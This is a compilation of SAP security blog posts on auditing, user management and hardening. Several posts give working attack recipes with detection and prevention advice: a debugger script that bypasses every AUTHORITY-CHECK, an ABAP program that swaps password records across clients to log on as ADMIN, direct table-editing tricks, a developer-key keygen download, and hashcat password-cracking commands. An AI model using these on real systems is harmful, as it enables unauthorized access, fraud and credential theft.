Direct table hacking

Changing directly data on an SAP table is the IT admin and IT auditors worst nightmare. This blog will show you the ways it can be done.

Questions that will be answered in this blog are:

  • How can I directly edit tables?
  • How can I prevent direct table editing?
  • How can I detect direct table editing?

Overview of methods

  1. Function module SE16N_INTERFACE
  2. Debug & replace
  3. SE16N_EMERGENCY mode
  4. Re-enable &sap_edit for SE16N

Direct table editing method 1: function module SE16N_INTERFACE

This method is available in the SAP S4HANA system. Start with transaction SE37 and key in function module SE16N_INTERFACE. Now press the test button. In this demo we will change dates for sales order table VBAK. In the SE37 test screen enter table VBAK and very important put X in the I_EDIT and I_SAPEDIT fields.

Now hit execute and voila: you are in direct edit mode:

Now we change a few values (date to the year 2027…) and press save:

Data is changed.

Detection of this method: audit logging. In audit logging you can see the user started SE37 and then used report RS_TEST_FRAME_CALL, but you cannot see which module was done, neither is the data change logged.

Prevention of this method:

  1. Debug/replace is needed to change the data: don’t hand out debug/replace.
  2. Deny access to this function module.

Direct table editing method 2: debug/replace

Start transaction SE16 and show the data of the table to edit. Example in this case VBAK data:

Now select a line and put /h for debugging in the command line input. Press enter and the debug screen will open. Double click on the SY-UCOMM field:

In the variables screen now change the value ENTR (for the enter command you gave) to value AEN2 (command to change). Make sure the value is accepted. Now hit F8 to continue. And voila: edit mode:

Change the values (dates in this example) and press save:

How to detect this method: in the SAP audit log (activation of audit log is explained in this blog) show the change in debug/replace mode:

Prevention of this method: don’t hand out debug/replace rights.

And configure the audit log for detection: 3226223 – How to monitor debug activities in SAP Netweaver.

Direct table editing method 3: SE16N emergency mode

In newer SAP netweaver releases there is a new SE16N emergency mode which can be started with transaction SE16N_EMERGENCY. Read all the details in this special blog on this topic.

Direct table editing method 4: re-enable &sap_edit again in SE16N and use it

Apply OSS note 1468636 – CO-OM tools: SE16N: Use of &SAP_EDIT. This seems old, but it is still valid for all S4HANA releases as well. After the note is installed run program RKSE16N_EDIT and activate the function:

Now start SE16N and select your inputs. Before hitting the execute button, enter the command &sap_edit:

Only now press execute. The result is fully editable table.

Audit log detection

Apply/configure OSS note 3140539 – SAL | New event definition for change access in SE16N for detection of table changes in the audit log.

Also check these notes:

STAUTHTRACE: improved authorization trace

If you are still using the old classic ST01 authorization trace, do keep on reading and you will want to switch to the new STAUTHTRACE improved authorization trace.

Questions that will be answered in this blog are:

  • How to run the new STAUTHTRACE tool?
  • What are the major improvements in STAUTHTRACE tool?

For long term user tracing there is a different tool: STUSERTRACE. Read more in this blog.

Running new STAUTHTRACE tool

To run the new tool start transaction STAUTHTRACE. If the transaction code is too complex, add it as favorite to your start screen.

From the start screen you see the immediate benefits. You can start the authorization trace for:

  • All application servers in one go (this is highly useful in an authorization issue with RFC users or background users where you have no control on which application server it will run): just record on all servers
  • Specific user only, but errors only: this will reduce your logging footprint to errors only
  • Filter the results to not show duplicate entries

Results

The result screen from STAUTHTRACE is similar to ST01 trace

But the result is more comprehensive, since it can take errors only, with duplicates filtered and take data from all application servers. This make the result complete and more easy to catch authorization issues.

Background

The background and all feature of STAUTHTRACE are kept in SAP OSS note 2577291 – How to get trace of authorization checks using transaction STAUTHTRACE. Main note with references: 1603756 – Using STAUTHTRACE to record authorization checks.

Bug fix notes:

ABAP developer keys and object keys hack

A lot of basis and ABAP people feel protected by the ABAP keys and object keys for standard SAP changes. They have to be called off at SAP marketplace keys section.

Let me already give away the clue: since quite some time there is a KeyGen for ABAP and object keys. The protection is gone.

This blog will answer following questions:

  • Where can I download the ABAP keygen?
  • How to run the ABAP keygen?
  • How should I protect my system from unwanted ABAP changes?
  • S4HANA does not use developer keys and object keys any more, how should I protect my S4HANA system from unwanted ABAP changes?

Where can I download the ABAP keygen?

Google for SAP IWR Object key generator. Or click here for a copy:

Upon download: rename the file to .zip and unzip it.

New version W10 compliant, but not scanned (download and use at own risk!)

Credits for this version: Hugos.

Running ABAP keygen

Running the executable is simple. But you need to run it in Windows 7 compatibility mode.

Keygen screen

Fill out the data and hit generate…. that’s all.

The use of this tool is at your own risk. Most admins don't like you to use this tool at all.

The whole idea of this blog is to show not to rely on the developer key procedure.

How should I protect developments?

The best way to protect your development is to carefully grant the S_DEVELOP privilege. Only give it to the right people and only give it to develop Z* range of code.

Deletion of old developer keys is still relevant. Read the dedicated blog on deletion of developer keys.

S4HANA developer key

The title is a bit misleading. In S4HANA there are no developer keys and object keys any more.

Background of this change be SAP can be found in OSS note: 2309060 – The SSCR license key procedure is not supported in SAP S/4 HANA.

So in S4HANA, you must set up authorizations for S_DEVELOP properly.

With S_DEVELOP you have to set create/change rights for the packages and or objects. For custom code only hand out Z* privileges.

If you hand out a * for the objects or classes, then the developer can also change standard SAP.

For more background and further information, read this dedicated blog on ABAP protection in S/4HANA.


Debug scripting to bypass AUTHORITY-CHECK statements

How annoying these authorizations are… isn’t there a way to mass bypass them?

This blog will explain how you can do this with the use of debug scripting.

Recipe for bypassing authority-check via debug script

As input we need to have development rights with debug and replace (without replace it will not work).

Now we start a program like RSUSR003 in SE38 and find out we are not authorized:

RSUSR003

Now we start the debugger with /h and goto the scripting tab:

Script page

In the coding block of the script load this block of coding:

 *<SCRIPT:PERSISTENT>


*<SCRIPT:HEADER>
*<SCRIPTNAME>ZBYPASS</SCRIPTNAME>
*<SCRIPT_CLASS>LCL_DEBUGGER_SCRIPT</SCRIPT_CLASS>
*<SCRIPT_COMMENT>Debugger Skript: Default Template</SCRIPT_COMMENT>
*<BP_REACHED>X</BP_REACHED>

*</SCRIPT:HEADER>

*<SCRIPT:PRESETTINGS>
*<BP>
*<FLAGACTIVE>X</FLAGACTIVE>
*<KIND>1 </KIND>
*<STATEMENTSTA>AUTHORITY-CHECK</STATEMENTSTA>
*</BP>

*</SCRIPT:PRESETTINGS>

*<SCRIPT:SCRIPT_CLASS>
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script DEFINITION INHERITING FROM  cl_tpda_script_class_super  .

  PUBLIC SECTION.
    METHODS: prologue  REDEFINITION,
      init    REDEFINITION,
      script  REDEFINITION,
      end     REDEFINITION.

ENDCLASS.                    "lcl_debugger_script DEFINITION
*---------------------------------------------------------------------*
*       CLASS lcl_debugger_script IMPLEMENTATION
*---------------------------------------------------------------------*
*
*---------------------------------------------------------------------*
CLASS lcl_debugger_script IMPLEMENTATION.
  METHOD prologue.
*** generate abap_source (source handler for ABAP)
    super->prologue( ).
  ENDMETHOD.                    "prolog

  METHOD init.
*** insert your initialization code here
  ENDMETHOD.                    "init
  METHOD script.

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

*************************************************
* debugger commands (p_command):
* Step into(F5)   -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_INTO
* Execute(F6)     -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OVER
* Return(F7)      -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_STEP_OUT
* Continue(F8)    -> CL_TPDA_SCRIPT_DEBUGGER_CTRL=>DEBUG_CONTINUE
*************************************************
****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DEBUGGER_CTRL / METHOD = DEBUG_STEP )
*Importing
*        REFERENCE( P_COMMAND ) TYPE I
****************************************************************

****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_ABAPDESCR / METHOD = LINE )
*Returning
*        VALUE( P_LINE ) TYPE I
****************************************************************

    TRY.
        CALL METHOD abap_source->line
          RECEIVING
            p_line = DATA(p_line).
      CATCH cx_tpda_src_info .
      CATCH cx_tpda_src_descr_invalidated .
    ENDTRY.

    TRY.
        CALL METHOD debugger_controller->debug_step
          EXPORTING
            p_command = cl_tpda_script_debugger_ctrl=>debug_step_over.
      CATCH cx_tpda_scr_rtctrl_status .
      CATCH cx_tpda_scr_rtctrl .
    ENDTRY.


****************************************************************
*Interface (CLASS = CL_TPDA_SCRIPT_DATA_DESCR / METHOD = CHANGE_VALUE )
*Importing
*        REFERENCE( P_NEW_VALUE ) TYPE STRING
*        REFERENCE( P_OFFSET ) TYPE I
*        REFERENCE( P_LENGTH ) TYPE I
*        REFERENCE( P_VARNAME ) TYPE STRING
****************************************************************

    TRY.
        CALL METHOD cl_tpda_script_data_descr=>change_value
          EXPORTING
            p_new_value = '0'
*           p_offset    = -1
*           p_length    = -1
            p_varname   = 'sy-subrc'.
      CATCH cx_tpda_varname .
      CATCH cx_tpda_scr_auth .
    ENDTRY.

  ENDMETHOD.                    "script
  METHOD end.
*** insert your code which shall be executed at the end of the scripting (before trace is saved)
*** here

  ENDMETHOD.                    "end
ENDCLASS.                    "lcl_debugger_script IMPLEMENTATION
*</SCRIPT:SCRIPT_CLASS>

*</SCRIPT:PERSISTENT>

Check the code by hitting the check button.

If the code is ok, set the break-point at ABAP command AUTHORITY-CHECK:

Breakpoint

Now click on the Start Script button.

End result: you can execute the program without any issues.

Explanation of the method

What has happened here? The debug scripting is nothing more then fast automation. The developer could have manually bypassed all the multiple authorization checks in this program. Now he lets the script take care: the coding of the script simple changes the SY-SUBRC value after any break-point (which is reached at statement AUTHORITY-CHECK) to 0, which is green light: pass.

Prevention

If you don’t want this to happen in your system there are 2 main measures to take:

  1. Remove debug & replace authorization from all non-ABAP developers in a development system and remove debug & replace from all non-development systems for all users
  2. Make sure you tell the ABAP developers that you are aware of this script. You cannot prevent them from running it, but you can tell them that if you find out it can have severe consequences.

See also OSS note 3226223 – How to monitor debug activities in SAP Netweaver.

SAP security baseline template

This blog will explain the use of SAP security baseline template.

Questions that will be answered in this blog are:

  • Where to find the SAP security baseline template?
  • What does the SAP security baseline template cover?
  • How can I use the SAP security baseline template?

The SAP security baseline template

Background information and the current download link to the SAP security baseline template can be found in OSS note 2253549 – The SAP Security Baseline Template. Or using following path: https://support.sap.com/sos → Media Library → SAP Security Baseline Template.

Current version is 2.5 from April 2024.

The content

The security baseline template contains a large 150 page word document from SAP covering all the topics of the SAP secure operations road map:

security baseline template overview

For each topic SAP will give must do actions, recommendations, tips and best practices.

This makes the SAP security baseline document a good document for:

  1. Starting security set up for a new greenfield implementation
  2. As as check list for existing implementations

Security baseline validation

SAP Focused run has a tool called security and baseline validation. Read more in this blog.

Security baseline updates

S4HANA has a special program to check for newly updated security baseline parameters after an upgrade. Read more on this topic in this blog.

Cross client access hacking

Most people underestimate how easy it is to gain access from one client to another client. This blog will explain how easy it is to do it.

Questions that will be answered in this blog are:

  • How to execute a cross client access hack?
  • How to detect this attack?
  • What preventive measures should I take to prevent this in my systems?

Cross client hack explained

You have gained access to a maintenance client by any method (most easy is standard users: see blog on this topic). Some basis and security people will waive this away and say: “by having access to client 066 the hacker cannot do anything, since the real business data is stored into a different client”.

So what the hacker will do is simple open the system client for ABAP coding (SCC4 client opening works from any client). Then he loads this simple program:

REPORT ZSWAPUSER. 

data: zls_usr02_1 type usr02. 
data: zls_usr02_2 type usr02. 
data: zls_usr02_t type usr02. 

parameters p_uname1 type usr02-bname. 
parameters p_mandt1 type sy-mandt. 
parameters p_mandt2 type sy-mandt.

select single * from usr02 client specified into zls_usr02_1 where bname eq p_uname1 and mandt = p_mandt1. 

select single * from usr02 client specified into zls_usr02_2 where bname eq p_uname1 and mandt = p_mandt2. 

zls_usr02_t = zls_usr02_1. zls_usr02_t-mandt = p_mandt2. modify usr02 client specified from zls_usr02_t. 
write sy-subrc. 

zls_usr02_t = zls_usr02_2. zls_usr02_t-mandt = p_mandt1. 
modify usr02 client specified from zls_usr02_t. 
write sy-subrc.

In the source client hacked a new user will be created. Let’s say the user ADMIN, which is also existing in the target client. The hacker creates the user ans sets the password in the source client he has access to. Now he runs the program. The program simply reads the password cross client (yes, ABAP can do cross client reading and updating), and then swaps them…..

After the swap the hacker will logon to the target client with the password he has set and enjoys all the roles from the user ADMIN. After he is done, he simply runs the program again. Then the old password is put back again.

Detecting this attack

Detecting this attack directly is very difficult. There are traces:

  • Client opening and closing in the source client
  • The presence of the ABAP code
  • The ABAP action in the source client’s audit log (you did switch on the audit log in all clients, didn’t you? And if you didn’t read this blog how to do it and execute it!)
  • ADMIN access from same terminal as the hacker is using to logon to the source client

Preventive measures

The following preventive measures can be taken:

  • Reset all standard passwords in all systems in all clients (see blog)
  • Delete no longer needed clients 001 and 066 (see blog)
  • Switch on audit logging in all clients (see blog)

Mass locking and end validity date of users

There are 2 good reasons for mass locking and ending validity date of user: security and licenses.

Questions that will be answered in this blog are:

  • How can I mass lock users automatically if they have not logged on for a certain time?
  • How can I mass set the validity date of the users that did not log on for a certain time?

Automatic lock of user after expired logon

In RZ11 you can set parameter login/password_max_idle_productive with an amount in days.

Password max idle initial

If the user (including yourself) did not logon to the system after this amount of days the password is still valid, but it does not allow you to logon.

If the user tries to logon after the period he will see this error message and cannot continue:

Password deactivated

In SU01 such a user looks like this:

Password expired

If you also want to automatically lock users after you give them a new password, use the parameter login/password_max_idle_initial.

Initial passwords is one of the nice ways of entering a system as hacker. Especially if the initial password used by the admin is more or less the same (like Welcome_1234!). Countermeasure: instruct your admins to use the Password Generator. This will generate long random once off password.

Mass setting of user validity date

For user measurement and security reasons you want to limit the validity period as well. Users who are locked still count for user measurement (see blog on license measurement tips & tricks). Users locked and unlocked by some method can be security threat.

Standard SAP program RSUSR_LOCK_USERS (built on top of program RSUSR200) is the tool to achieve this.

It has quite a long selection screen:

RSUSR_LOCK_USERS screen 1

On the first block set the dates for last logon and password change to get a good selection of users.

RSUSR_LOCK_USERS screen 2

On the second block very important to only select Dialog Users.

First run with Test Selection to get a list. If you are happy with the list, run it with Set End Of Validity Period.

OSS notes

Performance and bug notes (OSS search hints RSUSR200 and RSUSR_LOCK_USERS):

Client 001 and 066 deletion

Questions that will be answered in this blog:

  • Why delete clients 001 and 066?
  • How to delete clients 001 and 066?
  • How to test the deletion before executing in a productive environment?

Why delete clients 001 and 066?

The clients 001 and 066 had a purpose in the past and do not have them any more.

The only thing they do now is pose a security threat. Access can be gained to these clients, for example via standard SAP users, and from these client you could take over the system via a cross client attack. Background on client 066 can be found in OSS note 1897372 – EarlyWatch Mandant 066 – Can Client 066 be deleted?.

Also unwanted batch jobs might be still running from these clients consuming resources.

For an S4HANA system conversion, these clients must be deleted.

You can use SAP Focused Run security and configuration validation to quickly detect existance of client 001 and/or 066. Read more in this blog.

How to execute client 001 and 066 deletion?

You can delete client 001 and 066 according to the instructions in SAP note 1749142 and on the respective blog “How to remove unused clients including client 001 and 066” on SCN.

Testing the deletion

The deletion can be tested on a development and QA system before it is done on productive system. If really in doubt copy the productive system to a different system and perform the deletion there first as a test.

SAP password hash hacking Part IV: rule based attack

This blog series will explain the process of hacking SAP password hashes: also know as SAP password hacking. The process of hacking will be explained and appropriate countermeasures will be explained.

In this fourth blog we will continue with more complex attacks on the SAP password hashes and will also explain more preventive measures.

For the first blog on attacking the SAP BCODE hash click here.

For the second blog on attacking the SAP PASSCODE has click here.

For the third blog on attacking the SAP PWDSALTEDHASH has click here.

Questions that will be answered in this blog are:

  • How does the rule based attack work?
  • How to use the rules on found passwords?
  • Where to find good rule books?

The rule based attack

The dictionary rule book attack is using the dictionary as input and then applies rules to the dictionary to generate a new password candidate.

Example words we will use are Password and Welcome.

Examples of apply some rules:

  • Replace a with @ will give P@ssword
  • Replace o with 0 will give Passw0rd and Welc0me
  • Replace s with $ will give Pa$$word
  • Replace l with ! will give We!come
  • All rules above combined will give P@$$w0rd and We!c0me

For full list of possible rule syntax see Hashcat site on rule-based attack.

Suppose we have guessed one correct password for one user. He made the password Welcome1!.

Now we will construct some rules:

  1. Replace e with 3, rule will be se3
  2. Replace l with 1 and l with !, rules will be sl1 and sl!
  3. Replace o with 0, rule will be so0

We use these 3 hashes as input:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=
{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=

We construct an input file with word Welcome1! and a file with these rules:

se3

sl!

sl1

so0

Now we call Hashcat with the rule based attack mode:

hashcat64 -a 0 -m 10300 -p : --session=all -o "C:\hashes_found.txt" --outfile-format=3 -n 32 --gpu-temp-abort=80 -r "C:\simplerules.txt" "C:\hashes.txt" "C:\welcome.txt"

Great: 2 catches out of 3:

{x-issha, 1024}riqL3PXHJMOKkofOv1I4ObteIEGKw/OMny0U8MzMZ04=:We1come1!
{x-issha, 1024}AxErKhue0RAUveCTBgpAiJIaSDWGKdjpooiDSn5sTtg=:Welc0me1!

Now let’s add these rules:

o03
o13
o23

This means replace first character with digit 3, repeat for second and third.

We run again Hashcat and find the 3rd one:

{x-issha, 1024}7SC51LKZChMcpwmixb/ca/+qYvDxsXTbR3mE0IPrsaU=:W3lcome1!

What has happened here? Why is this found now, and not before with the se3 rule, which should substitute the e with 3? Pretty simple: replace e with 3 in word Welcome1! will give W3lcom31!. So it replaces all and not first one. This is there background of having many rules.

Huge rulesets

With the Hashcat download you get a special directory called rules. Here there are some big rulesets available.

The nicest one is the RockYou list of rules. This is constructed based on the RockYou password list hacked in 2009 where 32 million passwords leaked. Based on English dictionary somebody has constructed the rules to come to most of these passwords.

Effectiveness of the attack

The effectiveness of the rule based attack is quite high. If you have found 1 password, you just run the complete ruleset of one of the huge lists to find multiple variations. People are not so inventive and creative. You will be surprised on the amount of password variations you find on the following words:

  • Welcome
  • Summer
  • Winter
  • Password
  • Apple
  • Android
  • Google

Hackers don’t start with the full dictionary. They start with the top 1000 words and apply many rules to them. From the passwords found they will start to derive patterns of the users. Any new password is processed through many new rules to generate candidates with higher potential.

The name and or abbreviation of a company is word number 1 to add to the favorite word list.

Further optimization of the attack speed

For optimizing the attack speed, read the fifth blog on SAP password hash hacking here.

Prevention measure 1: frequent change and large change per time

Many companies have implemented a more faster cycle of password changes. In the past once per year was common. Nowadays 60 to 90 days is more common practice. Set this in profile parameter: login/password_expiration_time.

More important is to make a larger change per time the password changes. This is to avoid the rule-attacks explained above to become very effective. How many people just simply change and increase single digit in password? Or increase the special with the next one on the keyboard. Set the profile parameter login/min_password_diff to sufficiently high value of 3 or more.

Prevention measure 2: length

Explain to your users that length is more important than complexity by using this famous explanation:

correct horse battery staple

Prevention measure 3: stronger hashes

Stronger hashes simply take more time to crack. To set stronger hashes, read this dedicated blog.

Next blog on password hacking

The fifth blog on password hacking is about optimizing the attack speed. Read on in the blog. And the blog on extended word lists.

User role comparison

When you have updated a role this update needs to be reconciled with the existing users assigned to the role. This blog will explain how to do this.

Questions that will be answered are:

  • How to execute user role comparison?
  • How to perform mass execution?
  • What should I do in a productive system?

User compare in role building

User compare in role building is pretty easy. In PFCG when you get the yellow traffic light in the user tab the screen looks as follows:

Role user comparison

Simply hit the User Comparison button and you are done:

After PFUD run

Mass run of user comparison

With transaction PFUD you can do a mass user assignment comparison:

PFUD start screen

More information on PFUD can be found in OSS note 511200 – PFCG/PFUD/SU01/SU10: Role assignment and profile comparison.

Bug fix notes:

Running after transports and running in productive system

When you transport a role some changes might end up into the roles being updated, but the user comparison is not done. The end result is that the assigned authorization does not work, and you might get lots of complaints.

In oss note 571276 – PFCG: Transport of roles, SAP explains regarding the cleanup option: “If you schedule the user comparison in a way that means that there might be time overlaps with role imports, you should always deactivate the “Cleanups” option. Otherwise, imported profile data might be deleted.” and “The cleanup is not a security issue, so it does not have to be active for every comparison. Experience shows that it is sufficient to execute it once a week. However, it must be scheduled so that no role import is in progress at the same time.”.

That’s why it is wise to run the program behind PFUD, RHAUTUPD_NEW, in each system on daily or bi-daily basis without the cleanup option. And run it once per week in the weekend with the cleanup option enabled.

PFUD_AIMP transaction

OSS note 2734455 – Optimized user comparison after role imports contains optimized way for the comparison in some cases when you transport roles. It also explains the new PFUD_AIMP transaction.